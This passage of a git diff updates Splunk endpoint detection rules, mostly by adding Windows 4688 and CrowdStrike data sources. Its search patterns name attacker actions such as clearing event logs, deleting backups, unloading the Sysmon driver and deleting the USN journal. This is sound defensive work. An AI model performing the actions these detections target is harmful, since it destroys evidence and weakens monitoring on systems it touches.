   values(Processes.process_name) values(Processes.parent_process_name) dc(Processes.process)
   as distinct_commands dc(Processes.process_name) as distinct_process_names min(_time)
diff --git a/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml b/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
index 48390203df..31643cf1fe 100644
--- a/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
+++ b/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the renaming of microsoft.workflow.c
   potentially leading to privilege escalation or persistent access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=microsoft.workflow.compiler.exe
   AND Processes.original_file_name=Microsoft.Workflow.Compiler.exe by Processes.dest
diff --git a/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml b/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
index 56b154229c..efc1b7bd41 100644
--- a/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
+++ b/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the usage of microsoft.workflow.c
   further compromise of the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_microsoftworkflowcompiler`
   by Processes.dest Processes.parent_process Processes.process_name Processes.original_file_name
diff --git a/detections/endpoint/suspicious_msbuild_path.yml b/detections/endpoint/suspicious_msbuild_path.yml
index 8ce76cd24a..cbf33a061c 100644
--- a/detections/endpoint/suspicious_msbuild_path.yml
+++ b/detections/endpoint/suspicious_msbuild_path.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of msbuild.exe from a
   arbitrary code, potentially leading to system compromise and further malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_msbuild` AND (Processes.process_path!=*\\framework*\\v*\\*)
diff --git a/detections/endpoint/suspicious_msbuild_rename.yml b/detections/endpoint/suspicious_msbuild_rename.yml
index 4d0bf6139e..3151e43ca5 100644
--- a/detections/endpoint/suspicious_msbuild_rename.yml
+++ b/detections/endpoint/suspicious_msbuild_rename.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of renamed instances o
   network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=msbuild.exe
   AND Processes.original_file_name=MSBuild.exe by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/suspicious_msbuild_spawn.yml b/detections/endpoint/suspicious_msbuild_spawn.yml
index 2effe22e78..b5f7878d19 100644
--- a/detections/endpoint/suspicious_msbuild_spawn.yml
+++ b/detections/endpoint/suspicious_msbuild_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where wmiprvse.exe spaw
   system compromise or further malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wmiprvse.exe
diff --git a/detections/endpoint/suspicious_mshta_child_process.yml b/detections/endpoint/suspicious_mshta_child_process.yml
index 8590a0251f..c392117799 100644
--- a/detections/endpoint/suspicious_mshta_child_process.yml
+++ b/detections/endpoint/suspicious_mshta_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies child processes spawned from "msh
   "mshta.exe" for malicious purposes.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=mshta.exe
diff --git a/detections/endpoint/suspicious_mshta_spawn.yml b/detections/endpoint/suspicious_mshta_spawn.yml
index 5cd24fa16f..4bcdb845fa 100644
--- a/detections/endpoint/suspicious_mshta_spawn.yml
+++ b/detections/endpoint/suspicious_mshta_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the spawning of mshta.exe by wmiprvs
   activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe
diff --git a/detections/endpoint/suspicious_plistbuddy_usage.yml b/detections/endpoint/suspicious_plistbuddy_usage.yml
index 336f2ba446..096d7654b2 100644
--- a/detections/endpoint/suspicious_plistbuddy_usage.yml
+++ b/detections/endpoint/suspicious_plistbuddy_usage.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the use of the native macOS util
   on the compromised macOS system.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=PlistBuddy
   (Processes.process=*LaunchAgents* OR Processes.process=*RunAtLoad* OR Processes.process=*true*)
diff --git a/detections/endpoint/suspicious_process_executed_from_container_file.yml b/detections/endpoint/suspicious_process_executed_from_container_file.yml
index 61a49ede77..2b223dad30 100644
--- a/detections/endpoint/suspicious_process_executed_from_container_file.yml
+++ b/detections/endpoint/suspicious_process_executed_from_container_file.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies a suspicious process executed fro
   privileges, or persist within the environment, posing a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process IN ("*.ZIP\\*","*.ISO\\*","*.IMG\\*","*.CAB\\*","*.TAR\\*","*.GZ\\*","*.RAR\\*","*.7Z\\*")
diff --git a/detections/endpoint/suspicious_process_file_path.yml b/detections/endpoint/suspicious_process_file_path.yml
index 838a902c60..183bce4670 100644
--- a/detections/endpoint/suspicious_process_file_path.yml
+++ b/detections/endpoint/suspicious_process_file_path.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies processes running from file paths
   and further malicious activities within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_path = "*\\windows\\fonts\\*"
diff --git a/detections/endpoint/suspicious_reg_exe_process.yml b/detections/endpoint/suspicious_reg_exe_process.yml
index 5f33d5b64c..6cfea57cca 100644
--- a/detections/endpoint/suspicious_reg_exe_process.yml
+++ b/detections/endpoint/suspicious_reg_exe_process.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies instances of reg.exe being launch
   or persistent access.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name
   != explorer.exe Processes.process_name =cmd.exe by Processes.user Processes.process_name
diff --git a/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml b/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml
index 76158d6124..100fc1b120 100644
--- a/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml
+++ b/detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Regsvr32.exe to register
   or further lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process
   IN ("*\\appdata\\*", "*\\programdata\\*","*\\windows\\temp\\*") NOT (Processes.process
diff --git a/detections/endpoint/suspicious_rundll32_dllregisterserver.yml b/detections/endpoint/suspicious_rundll32_dllregisterserver.yml
index c5697dbc90..7ac0a8e5db 100644
--- a/detections/endpoint/suspicious_rundll32_dllregisterserver.yml
+++ b/detections/endpoint/suspicious_rundll32_dllregisterserver.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of rundll32.exe with t
   persistence within the environment, posing a severe security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver*
   by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml b/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml
index c765ae417e..2e6f02d75c 100644
--- a/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe withou
   file writes, or other malicious actions.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_rundll32` by _time span=1h  Processes.process_id Processes.process_name
   Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/suspicious_rundll32_plugininit.yml b/detections/endpoint/suspicious_rundll32_plugininit.yml
index e4b5a30ee4..5aead75ded 100644
--- a/detections/endpoint/suspicious_rundll32_plugininit.yml
+++ b/detections/endpoint/suspicious_rundll32_plugininit.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of the rundll32.exe
   further malware infections, data exfiltration, or complete system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*PluginInit*
   by  Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/suspicious_rundll32_startw.yml b/detections/endpoint/suspicious_rundll32_startw.yml
index f8b24376d3..51d99dfeca 100644
--- a/detections/endpoint/suspicious_rundll32_startw.yml
+++ b/detections/endpoint/suspicious_rundll32_startw.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of rundll32.exe wit
   maintain persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*start*
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml b/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml
index 230691fe2e..bac243e316 100644
--- a/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml
+++ b/detections/endpoint/suspicious_scheduled_task_from_public_directory.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the creation of scheduled tasks
   within the network.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
   (Processes.process=*\\users\\public\\* OR Processes.process=*\\programdata\\* OR
diff --git a/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml b/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml
index bbd7412255..22de13f058 100644
--- a/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml
+++ b/detections/endpoint/suspicious_searchprotocolhost_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of searchprotocolhost.exe
   credential dumping, or other malicious actions within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=searchprotocolhost.exe by _time span=1h  Processes.process_id
   Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process
diff --git a/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml b/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml
index 97e8ce4886..d5317a10ef 100644
--- a/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml
+++ b/detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of SQLite3 querying the M
   or persistent adware infections.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=sqlite3
   Processes.process=*LSQuarantine* by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml b/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml
index b05b86bfc6..c760f75277 100644
--- a/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml
+++ b/detections/endpoint/suspicious_wav_file_in_appdata_folder.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of .wav files in the Ap
   the affected system's confidentiality.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*"
diff --git a/detections/endpoint/suspicious_wevtutil_usage.yml b/detections/endpoint/suspicious_wevtutil_usage.yml
index 33f88b93b9..d7b523fc14 100644
--- a/detections/endpoint/suspicious_wevtutil_usage.yml
+++ b/detections/endpoint/suspicious_wevtutil_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the usage of wevtutil.exe with param
   and understand the full scope of the compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process_name=wevtutil.exe Processes.process IN ("* cl *", "*clear-log*")
diff --git a/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml b/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml
index defc4d90ed..a7eaa48cd9 100644
--- a/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml
+++ b/detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml
@@ -8,8 +8,7 @@ type: TTP
 description: |-
   The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin. It leverages the Endpoint.Filesystem and Endpoint.Processes data models in Splunk to identify any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This activity is significant because it may indicate an attacker attempting to hide their actions, potentially leading to data theft, ransomware, or other malicious outcomes. If confirmed malicious, this behavior could allow an attacker to persist in the environment and evade detection by security tools.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Filesystem.file_path) as file_path values(Filesystem.file_name)
   as file_name FROM datamodel=Endpoint.Filesystem where Filesystem.file_path = "*$Recycle.Bin*"
diff --git a/detections/endpoint/svchost_lolbas_execution_process_spawn.yml b/detections/endpoint/svchost_lolbas_execution_process_spawn.yml
index f6aa015e9e..233f1b41a3 100644
--- a/detections/endpoint/svchost_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/svchost_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of 'svchost.exe' spawning
   persistence within the environment, posing a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe)
   (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/system_info_gathering_using_dxdiag_application.yml b/detections/endpoint/system_info_gathering_using_dxdiag_application.yml
index db166e66b2..6ac1bc2106 100644
--- a/detections/endpoint/system_info_gathering_using_dxdiag_application.yml
+++ b/detections/endpoint/system_info_gathering_using_dxdiag_application.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the dxdiag.exe p
   further exploitation or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_dxdiag` AND Processes.process
   = "* /t *" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/system_information_discovery_detection.yml b/detections/endpoint/system_information_discovery_detection.yml
index 4e5fa399e2..5889bf05c9 100644
--- a/detections/endpoint/system_information_discovery_detection.yml
+++ b/detections/endpoint/system_information_discovery_detection.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies system information discovery tech
   privilege escalation, persistence, or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process="*wmic* qfe*"
   OR Processes.process=*systeminfo* OR Processes.process=*hostname*) by Processes.user
diff --git a/detections/endpoint/system_processes_run_from_unexpected_locations.yml b/detections/endpoint/system_processes_run_from_unexpected_locations.yml
index c446396c02..a9c8c5d032 100644
--- a/detections/endpoint/system_processes_run_from_unexpected_locations.yml
+++ b/detections/endpoint/system_processes_run_from_unexpected_locations.yml
@@ -14,6 +14,8 @@ description: 'The following analytic identifies system processes running from un
   persistence within the environment, posing a significant security risk.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where Processes.process_path !="C:\\Windows\\System32*"
   Processes.process_path !="C:\\Windows\\SysWOW64*" by Processes.dest Processes.user
diff --git a/detections/endpoint/system_user_discovery_with_query.yml b/detections/endpoint/system_user_discovery_with_query.yml
index 0ee1d19535..14ae5099f4 100644
--- a/detections/endpoint/system_user_discovery_with_query.yml
+++ b/detections/endpoint/system_user_discovery_with_query.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `query.exe` with co
   aiding in further lateral movement and privilege escalation within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="query.exe")
   (Processes.process=*user*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/system_user_discovery_with_whoami.yml b/detections/endpoint/system_user_discovery_with_whoami.yml
index 20c9d2afc6..23ac3bf748 100644
--- a/detections/endpoint/system_user_discovery_with_whoami.yml
+++ b/detections/endpoint/system_user_discovery_with_whoami.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `whoami.exe` withou
   the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="whoami.exe")
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/time_provider_persistence_registry.yml b/detections/endpoint/time_provider_persistence_registry.yml
index 3cfee5f93b..08637f9b05 100644
--- a/detections/endpoint/time_provider_persistence_registry.yml
+++ b/detections/endpoint/time_provider_persistence_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the time
   automatically upon system boot, potentially leading to further exploitation and
   control over the affected system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\CurrentControlSet\\Services\\W32Time\\TimeProviders*")
diff --git a/detections/endpoint/uninstall_app_using_msiexec.yml b/detections/endpoint/uninstall_app_using_msiexec.yml
index 3a5f4eb570..9477ed70f1 100644
--- a/detections/endpoint/uninstall_app_using_msiexec.yml
+++ b/detections/endpoint/uninstall_app_using_msiexec.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the uninstallation of applications u
   the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=msiexec.exe
   Processes.process= "* /qn *" Processes.process= "*/X*" Processes.process= "*REBOOT=*"
diff --git a/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml b/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml
index 6e7650ccd9..edc7472aa2 100644
--- a/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml
+++ b/detections/endpoint/unknown_process_using_the_kerberos_protocol.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies a non-lsass.exe process making an
   an adversary attempting to abuse the Kerberos protocol, potentially leading to unauthorized
   access or lateral movement within the network.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name!=lsass.exe by _time Processes.process_id Processes.process_name
   Processes.dest Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/unload_sysmon_filter_driver.yml b/detections/endpoint/unload_sysmon_filter_driver.yml
index cf0bb0a7ce..c3d901f658 100644
--- a/detections/endpoint/unload_sysmon_filter_driver.yml
+++ b/detections/endpoint/unload_sysmon_filter_driver.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of `fltMC.exe` to unload the
   data breaches, privilege escalation, or persistent access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process)
   as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fltMC.exe
   AND Processes.process=*unload* AND Processes.process=*SysmonDrv*  by Processes.process_name
diff --git a/detections/endpoint/unusually_long_command_line.yml b/detections/endpoint/unusually_long_command_line.yml
index 7e44a8e57c..6db35490b6 100644
--- a/detections/endpoint/unusually_long_command_line.yml
+++ b/detections/endpoint/unusually_long_command_line.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects unusually long command lines, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on the length of command lines executed on hosts. This behavior is significant because attackers often use obfuscated or complex command lines to evade detection and execute malicious payloads. If confirmed malicious, this activity could lead to data theft, ransomware deployment, or further system compromise. Analysts should investigate the source and content of the command line, inspect relevant artifacts, and review concurrent processes to identify potential threats.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name
   Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|
diff --git a/detections/endpoint/unusually_long_command_line___mltk.yml b/detections/endpoint/unusually_long_command_line___mltk.yml
index e0585e47eb..0581f36735 100644
--- a/detections/endpoint/unusually_long_command_line___mltk.yml
+++ b/detections/endpoint/unusually_long_command_line___mltk.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies unusually long command lines exec
   to unauthorized access, data exfiltration, or further compromise of the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name
   Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`|
diff --git a/detections/endpoint/user_discovery_with_env_vars_powershell.yml b/detections/endpoint/user_discovery_with_env_vars_powershell.yml
index bf025c6f7c..82bcb5d5f3 100644
--- a/detections/endpoint/user_discovery_with_env_vars_powershell.yml
+++ b/detections/endpoint/user_discovery_with_env_vars_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process="*$env:UserName*" OR Processes.process="*[System.Environment]::UserName*")
diff --git a/detections/endpoint/usn_journal_deletion.yml b/detections/endpoint/usn_journal_deletion.yml
index af019c6418..8c07f82226 100644
--- a/detections/endpoint/usn_journal_deletion.yml
+++ b/detections/endpoint/usn_journal_deletion.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the deletion of the USN Journal usin
   modifications and potentially compromising incident response efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe
diff --git a/detections/endpoint/vbscript_execution_using_wscript_app.yml b/detections/endpoint/vbscript_execution_using_wscript_app.yml
index c6ed45174a..edf4a61aaf 100644
--- a/detections/endpoint/vbscript_execution_using_wscript_app.yml
+++ b/detections/endpoint/vbscript_execution_using_wscript_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of VBScript using the
   data exfiltration, or further lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
   = "wscript.exe" AND Processes.parent_process = "*//e:vbscript*") OR (Processes.process_name
diff --git a/detections/endpoint/verclsid_clsid_execution.yml b/detections/endpoint/verclsid_clsid_execution.yml
index 5fcbc96f83..f13a64bca5 100644
--- a/detections/endpoint/verclsid_clsid_execution.yml
+++ b/detections/endpoint/verclsid_clsid_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the potential abuse of the verclsid.
   to system compromise or further malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.parent_process) as parent_process values(Processes.process_id)
   as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/w3wp_spawning_shell.yml b/detections/endpoint/w3wp_spawning_shell.yml
index 52aebab2b1..5ca141c849 100644
--- a/detections/endpoint/w3wp_spawning_shell.yml
+++ b/detections/endpoint/w3wp_spawning_shell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where a shell (PowerShe
   compromise, data exfiltration, or further lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=w3wp.exe
diff --git a/detections/endpoint/wbadmin_delete_system_backups.yml b/detections/endpoint/wbadmin_delete_system_backups.yml
index 80c1d088b1..1650bd43c0 100644
--- a/detections/endpoint/wbadmin_delete_system_backups.yml
+++ b/detections/endpoint/wbadmin_delete_system_backups.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of wbadmin.exe with fl
   to prolonged downtime and potential data loss.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wbadmin.exe
   Processes.process="*delete*" AND (Processes.process="*catalog*" OR Processes.process="*systemstatebackup*")
diff --git a/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml b/detections/endpoint/wermgr_process_spawned_cmd_or_powershell_process.yml
index df44295542..1309486162 100644
